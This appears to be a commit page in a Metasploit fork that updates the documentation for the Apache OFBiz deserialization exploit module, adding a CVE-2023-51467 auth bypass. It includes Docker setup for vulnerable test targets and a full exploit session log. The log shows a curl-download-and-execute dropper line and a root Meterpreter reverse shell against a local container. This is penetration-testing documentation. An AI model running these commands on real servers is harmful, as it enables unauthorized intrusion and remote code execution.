adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Land #18681, Update Apache Ofbiz w. Auth-Bypass

Browse Source 
This PR updates the pre-existing apache_ofbiz_deserialization
module to include functionality that will bypass authentication by
using the newly discovered CVE-2023-51467.
This commit is contained in:
Jack Heysel
2024-02-16 15:02:34 -05:00
parent 94f0d243c7 84278b8e0e
commit a1b0ff0fcf
2 changed files with 135 additions and 17 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/http/apache_ofbiz_deserialization.md
+63 -3
View File
@@ -4,14 +4,25 @@
This module exploits a Java deserialization vulnerability in Apache
OFBiz's unauthenticated XML-RPC endpoint `/webtools/control/xmlrpc` for
versions prior to 17.12.04.
versions prior to 17.12.01 using the `ROME` gadget chain.
Versions up to 18.12.11 are exploitable utilizing an auth bypass CVE-2023-51467
and use the `CommonsBeanutils1` gadget chain.
Verified working on 18.12.09, 17.12.01, and 15.12
### Setup
#### 15.12
You can use <https://hub.docker.com/r/opensourceknight/ofbiz>.
1. Initialize the database with demo data (`INIT_DB=2`) and bind to ports 8080 and 8443
* `docker run -p 8080:8080 -p 8443:8443 --rm -e INIT_DB=2 opensourceknight/ofbiz:15.12`
* `docker run -p 8080:8080 -p 8443:8443 --rm -e INIT_DB=2 opensourceknight/ofbiz:15.12`
#### 18.12.09
`docker run -p 8080:8080 -p 8443:8443 --rm -e INIT_DB=2 vulhub/ofbiz:18.12.09`
## Verification Steps
@@ -27,9 +38,11 @@ This executes a Unix command.
This uses a Linux dropper to execute code.
## Options
## Scenarios
### Apache OFBiz from [Docker](#setup).
### Apache OFBiz from [Docker](#setup) 15.12.
```
msf6 > use exploit/linux/http/apache_ofbiz_deserialization
@@ -101,3 +114,50 @@ BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
### Apache OFBiz from [Docker](#setup) 18.12.09.
```
[msf](Jobs:0 Agents:0) > use exploit/linux/http/apache_ofbiz_deserialization
[*] Using configured payload linux/x64/meterpreter_reverse_https
[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set ssl false
[!] Changing the SSL option's value may require changing RPORT!
ssl => false
[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set rport 8080
rport => 8080
[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set srvport 8999
srvport => 8999
[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set lport 9999
lport => 9999
[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set lhost 172.17.0.1
lhost => 172.17.0.1
[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > exploit
[*] Started HTTPS reverse handler on https://172.17.0.1:9999
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Apache OFBiz detected
[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_https
[*] Using URL: http://172.17.0.1:8999/t8Ht92vyG
[*] Client 172.17.0.2 (curl/7.74.0) requested /t8Ht92vyG
[*] Sending payload to 172.17.0.2 (curl/7.74.0)
[+] Successfully executed command: curl -so /tmp/ccOiSBWw http://172.17.0.1:8999/t8Ht92vyG;chmod +x /tmp/ccOiSBWw;/tmp/ccOiSBWw;rm -f /tmp/ccOiSBWw
[*] https://172.17.0.1:9999 handling request from 172.17.0.2; (UUID: jfvsjqze) Redirecting stageless connection from /bor18uxq2-DRFNcWtLP2lwc954AkmwDFJGPdMCAemNwEhbK9MZE1sbFjd87crw4EoQ8IRya-nD4j7s9vkiPXENKkm6Hai6rTX1l6MxXV with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0'
[*] https://172.17.0.1:9999 handling request from 172.17.0.2; (UUID: jfvsjqze) Redirecting stageless connection from /bor18uxq2-DRFNcWtLP2lwBlG7PmcChFTs3mrZWe19ux0Ge4-K3sXMWLGzskiOvEJN9O34cT2vhArtS36BI-SM8HDCBKggdyux0 with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0'
[*] https://172.17.0.1:9999 handling request from 172.17.0.2; (UUID: jfvsjqze) Redirecting stageless connection from /bor18uxq2-DRFNcWtLP2lwS1jEDX4_Jx7YDDvUtpywgCk with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0'
[*] https://172.17.0.1:9999 handling request from 172.17.0.2; (UUID: jfvsjqze) Attaching orphaned/stageless session...
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Meterpreter session 1 opened (172.17.0.1:9999 -> 172.17.0.2:47500) at 2024-01-16 20:04:06 -0500
[*] Server stopped.
(Meterpreter 1)(/usr/src/apache-ofbiz) > getuid
Server username: root
(Meterpreter 1)(/usr/src/apache-ofbiz) > sysinfo
Computer : 172.17.0.2
OS : Debian 11.4 (Linux 6.5.0-kali3-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
(Meterpreter 1)(/usr/src/apache-ofbiz) >
```